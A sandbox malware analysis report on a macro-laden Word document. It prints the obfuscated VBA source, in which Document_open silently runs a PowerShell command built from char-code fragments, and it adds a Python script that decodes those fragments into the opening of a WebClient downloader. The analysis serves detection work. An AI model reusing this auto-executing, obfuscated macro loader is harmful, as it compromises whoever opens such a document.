Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Word document (VB_Base = "1Normal.ThisDocument") containing VBA macros. The critical heuristic OLE_VBA_SHELL flags a call to the Shell() function, and OLE_VBA_PCODE_AUTOEXEC_EXEC confirms from the compiled p-code that an auto-execution entry point is paired with execution tokens, so the verdict does not depend on source extraction succeeding. In the extracted source, Private Sub Document_open() calls the function TZCIdAw, which invokes VBA.Shell(...) with window style 61365 - 61365 = 0 (vbHide), so the child process starts without a visible window. The command line never appears as a literal: it is assembled at run time from Chr(jtkDLbNCHY + vbKeyP + MqtHU) (the two undeclared operands are Empty, so this is Chr(80), "P"), the literal "owers", and the return values of helper functions such as bfwBVn, whose own string literals begin with "HeLL ([chAr[]]" followed by a comma-separated list of integers. The result is a PowerShell invocation whose real command is carried as an array of character codes that PowerShell decodes at run time, which is why a plain string match for "powershell" fails against the source. Everything else in each procedure is filler: assignments from undeclared variables and Tan()/Log()/Rnd() arithmetic under On Error Resume Next, none of which affects control flow. The decoded PowerShell is not present in the preview, so the second-stage download is a strong inference from this pattern rather than something the extracted source shows directly.
Heuristics (6)

- ClamAV: Doc.Malware.0053456c-6874533-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.0053456c-6874533-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that any Office file with drawing markup carries; it is not a network indicator and should not be treated as an IOC.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15046 bytes | 8948e9b18450444e44b9606de920d264bca15539da49a262fc95a9bb5ae69ef2 |

Preview script (first 1,000 lines of the extracted script)

The extracted file concatenates two modules (PzjIiOB, the ThisDocument module, and YjOnPikJjFMq). The live statements are the VBA.Shell call in TZCIdAw, the call to TZCIdAw from Document_open, and the string literals assigned in bfwBVn; they are marked with comments below. Every other statement is filler that assigns undeclared (Empty) variables and evaluates Tan()/Log()/Rnd() expressions whose errors are swallowed by On Error Resume Next.

```vba
Attribute VB_Name = "PzjIiOB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function TZCIdAw()
On Error Resume Next
SfjGZX = UOpGlk
XQvuG = CDbl(GNYLXF * CDbl(HsnlRl + Int(KLBVCn * Rnd(20892)) * twIwvY * Log(84673 * DtTQi - HYjTm + Fix(51))))
PSwoZ = Tan(25758)
PZrSl = CDbl(TZDaKM)
bbDpzB = Tan(81965)
rkszU = FDcmj
hfldCA = HmhVIJ
OjrLs = CDbl(AlImmI * CDbl(EVAik + Int(PfkFGp * Rnd(93789)) * tTVHia * Log(52821 * VbjaR - wXzrtj + Fix(51))))
jFSvS = Tan(94235)
ikVvqH = CDbl(mfIhq)
mlDkit = Tan(89071)
AYvKLV = MGOwNO
rqNfbn = kTjMto
MIaTYL = CDbl(XVZhb * CDbl(kUJIB + Int(zIihf * Rnd(69771)) * DcmfjU * Log(50635 * UJvjI - XTUnz + Fix(51))))
hSWzj = Tan(63750)
qdiavi = CDbl(HolqpN)
muPKa = Tan(21227)
fPLNc = napNuh
rqjAzR = iiizk
HfEzzS = CDbl(PnRfNw * CDbl(wbJkRd + Int(nYcNf * Rnd(52509)) * sGizz * Log(71415 * iJiHGn - DZDmw + Fix(51))))
vJNbFY = Tan(69830)
TGbkSq = CDbl(XhiiQ)
PHZuj = Tan(13348)
GURfc = pzkzZ
' Live line: Chr(0 + vbKeyP + 0) = "P", then "owers", then bfwBVn() and further
' fragments form the command; window style 61365 - 61365 = 0 = vbHide.
TZCIdAw = CqntZqG + VBA.Shell(umWjdEMR + Chr(jtkDLbNCHY + vbKeyP + MqtHU) + "owers" + bfwBVn + vjtlJt + NQBDOBshP + iAuhGq + jbSQi + RimhZQkQff + kmsJfAIiw, 61365 - 61365)
DVXhtp = QwWqU
lPvpt = CDbl(VRkiG * CDbl(JlmMm + Int(uRZKlw * Rnd(69939)) * nuYANJ * Log(9358 * voOvn - vZTmR + Fix(51))))
jEKlho = Tan(32767)
wbdwF = CDbl(ibtjU)
kDiEJW = Tan(91650)
zEqzzq = YWAqz
CHUKQ = frTfjR
hfMjG = CDbl(LXjwk * CDbl(TzHvLZ + Int(djvzWm * Rnd(64447)) * jjCUG * Log(65877 * YVWjN - jqWLk + Fix(51))))
FAjQUr = Tan(82913)
lliquZ = CDbl(iqdcd)
wqXwIG = Tan(83920)
IbmYbL = zsZlm
End Function
Private Sub Document_open()
On Error Resume Next
uamnf = oFBzsj
koPlX = CDbl(uXpsLw * CDbl(poJVG + Int(ONBioz * Rnd(85875)) * XOwtjC * Log(60782 * wtXMO - rFhaq + Fix(51))))
kJJju = Tan(26624)
iGblfs = CDbl(Itzft)
zzwjsK = Tan(40168)
TsPzu = vVwAN
hmmpS = jVwjLi
zDjHhi = CDbl(qZWmGO * CDbl(OFzqiz + Int(LlhCz * Rnd(21927)) * wwmlS * Log(33447 * NHQlj - jIPAj + Fix(51))))
QnXSP = Tan(443)
mlRwFj = CDbl(jrakB)
ISQwt = Tan(63921)
zRAziE = wcDVjS
' Live line: the auto-exec handler calls the function that runs Shell().
TZCIdAw
awIKBJ = phfwv
qRSOo = CDbl(mKhvSm * CDbl(UoIYqz + Int(SrEpX * Rnd(7116)) * imWqiX * Log(75750 * dQnFT - TsBqYL + Fix(51))))
CviCtD = Tan(67115)
NdqkvH = CDbl(LEjPC)
djIoBq = Tan(76156)
Krkld = zwDwz
MQnzUY = vhwGJI
TpXCXh = CDbl(AKiqrv * CDbl(RzDCi + Int(wuEmR * Rnd(10244)) * DQGrq * Log(69701 * hQqwJ - LLFIHc + Fix(51))))
zAGNBh = Tan(63183)
YkklSO = CDbl(jDnAHb)
iiksEa = Tan(10276)
AHEtj = kpwfod
End Sub

' Second module carried in the same extracted file.
Attribute VB_Name = "YjOnPikJjFMq"
Function bfwBVn()
On Error Resume Next
uzrHS = PnkrDV
LwiaZA = zYiAzh
UihTok = Tan(35984)
rvjGql = Tan(35456)
bfCiG = CDbl(skiAt)
jFXzMT = CDbl(ijMbV * CDbl(MSqLL + Int(OMHZU * Rnd(29014)) * GiwBM * Log(64224 * NMajtZ - acPWzE + Fix(51))))
' Live line: "HeLL ([chAr[]]" completes "PowersHeLL" and opens the encoded array.
MuYbK = "HeLL ([chAr[]]" + "( 15 ,94 , 111" + " ,94 ,79" + " , 95 , 11"
udJjd = GUthN
iwkujK = mhrlW
naLoXo = Tan(88792)
NmzQi = Tan(45807)
nAGqz = CDbl(jrYodv)
jwUna = CDbl(CUijk * CDbl(hXsasT + Int(cwszOw * Rnd(51278)) * SdFsG * Log(63188 * dORMq - VczPAS + Fix(51))))
' Live line: more character codes, split mid-number to defeat string matching.
IjkJoXqVlkI = ",22, 11 ," + "69 , 78 , 92" + ", 6,68 ," + "73, 65, 78, 7" + "2 , 95,11" + " ," + "89,74, 69 " + ", " + "79 , 68,"
fzwIz = VKqKUj
HpOKWq = mkbbWW
uLTHK = Tan(25898)
bUsSRU = Tan(33538)
ojDzI = CDbl(TEcMC)
swBIua = CDbl(ouTsLY * CDbl(rZHTM + Int(KEPwK * Rnd(73639)) * UjSGqI * Log(86202 * vQIZqz - uvSKS + Fix(51))))
' Live line.
zthDlpno = "70 ,16 , 15 " + ", 1" + "20 ,10" + "2,104 , 90" + ",115 , 79 " + ", 11" + ", 22,1" + "1 ,69, 78 ,92 ," + " 6,68 "
HvTKz = iSXBfD
uUnONK = qfORi
NdBljn = Tan(40804)
TLZYw = Tan(98157)
zbGRIf = CDbl(JZFmaG)
GmRwD = CDbl(NoDhi * CDbl(Wzopu + Int(dNVJLK * Rnd(64528)) * ocfics * Log(73132 * tjtaU - lrrnJC + Fix(51))))
' Live line.
ulhcapwV = ",73,65 , 78" + " ,72 , 95,11 ,1" + "20, 82 ,8" + "8 ,95 , 78,7" + "0 , 5 , 101" + ", " + "78,95 , 5,124"
inmIHF = SldqBb
FmIMwz = RhXckJ
GuNBl = Tan(41469)
zdssEQ = Tan(42534)
SABSwG = CDbl(oQSfO)
FRYo ... (truncated)
```
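What the fragments in bfwBVn decode to, as an added example written for this page (not code from the report, the sandbox, or the sample). It copies the string literals visible in the preview, emulates the visible concatenation in TZCIdAw (Chr(vbKeyP) is "P"), extracts the [char[]] integer array, and brute-forces a single-byte XOR key, ranking candidates by printability plus the presence of known PowerShell tokens. Two assumptions are marked in the code: the four string variables are joined in their order of appearance (the statement that joins them is in the truncated part of the artifact), and the array is single-byte XOR encoded (the decode step itself is not in the preview; values such as 5, 6 and 11 are below printable ASCII, so some transform must follow).

```python
"""Reassemble and decode the PowerShell command line built by the macro.

Added example, not part of the report or the sample. Inputs are the string
literals visible in the extracted macro; inferred pieces are marked ASSUMED.
"""
import re

# VBA constant vbKeyP. The other two operands of Chr() in TZCIdAw are
# undeclared variables, i.e. Empty, which VBA treats as 0 in arithmetic.
VB_KEY_P = 80

# Literal written in TZCIdAw between Chr(...) and the call to bfwBVn().
OWERS = "owers"

# String literals assigned inside bfwBVn (module YjOnPikJjFMq), copied from
# the preview including the VBA "+" splits. ASSUMED: they are joined in order
# of appearance; the joining statement is in the truncated part of the file.
MUYBK = "HeLL ([chAr[]]" + "( 15 ,94 , 111" + " ,94 ,79" + " , 95 , 11"
IJKJOXQVLKI = (",22, 11 ," + "69 , 78 , 92" + ", 6,68 ," + "73, 65, 78, 7"
               + "2 , 95,11" + " ," + "89,74, 69 " + ", " + "79 , 68,")
ZTHDLPNO = ("70 ,16 , 15 " + ", 1" + "20 ,10" + "2,104 , 90" + ",115 , 79 "
            + ", 11" + ", 22,1" + "1 ,69, 78 ,92 ," + " 6,68 ")
ULHCAPWV = (",73,65 , 78" + " ,72 , 95,11 ,1" + "20, 82 ,8" + "8 ,95 , 78,7"
            + "0 , 5 , 101" + ", " + "78,95 , 5,124")
FRAGMENTS = [MUYBK, IJKJOXQVLKI, ZTHDLPNO, ULHCAPWV]

# PowerShell tokens used as cribs when ranking candidate keys.
CRIBS = ("new-object", "webclient", "downloadfile", "invoke-", "start-process")


def shell_prefix():
    """Emulate the visible part of the Shell() argument in TZCIdAw."""
    return chr(0 + VB_KEY_P + 0) + OWERS + MUYBK


def looks_like_powershell(cmd):
    """Case-insensitive check that survives the 'P' + 'owers' + 'HeLL' split."""
    return cmd.lower().startswith("powershell")


def char_codes(fragments):
    """Pull the [char[]] integer array out of the reassembled fragments."""
    return [int(x) for x in re.findall(r"\d+", "".join(fragments))]


def xor_decode(codes, key):
    """ASSUMED transform: single-byte XOR of every character code."""
    return "".join(chr(c ^ key) for c in codes)


def plaintext_score(text):
    """-1 if any byte is non-printable; otherwise the count of lowercase
    letters and spaces, plus a large bonus when a crib token is present."""
    if any(not (32 <= ord(ch) < 127) for ch in text):
        return -1
    score = sum(ch == " " or "a" <= ch <= "z" for ch in text)
    if any(crib in text.lower() for crib in CRIBS):
        score += 100
    return score


def brute_force_xor(codes):
    """Try all 256 keys and return (key, plaintext) for the best candidate."""
    best_key, best_text, best_score = None, "", -1
    for key in range(256):
        text = xor_decode(codes, key)
        score = plaintext_score(text)
        if score > best_score:
            best_key, best_text, best_score = key, text, score
    return best_key, best_text


if __name__ == "__main__":
    prefix = shell_prefix()
    print("assembled prefix :", prefix)
    print("powershell?      :", looks_like_powershell(prefix))
    codes = char_codes(FRAGMENTS)
    key, text = brute_force_xor(codes)
    print(f"{len(codes)} char codes, best key 0x{key:02x}: {text!r}")
```

Run as-is; it prints the assembled "PowersHeLL ([chAr[]]..." prefix and the best-scoring key with its plaintext. For the 60 codes present in the preview, key 0x2B (43) is the only candidate that is fully printable and contains a crib, and the recovered text begins `$uDudt = new-object random;$SMCqXd = new-object System.Net.W`: two new-object statements, the usual opening of a WebClient-based downloader (the preview cuts off after the "W", so the class name and the URL list are in the truncated remainder). That is the evidence behind the second-stage inference in the summary; the same brute-force works on the full array once the rest of the artifact is available.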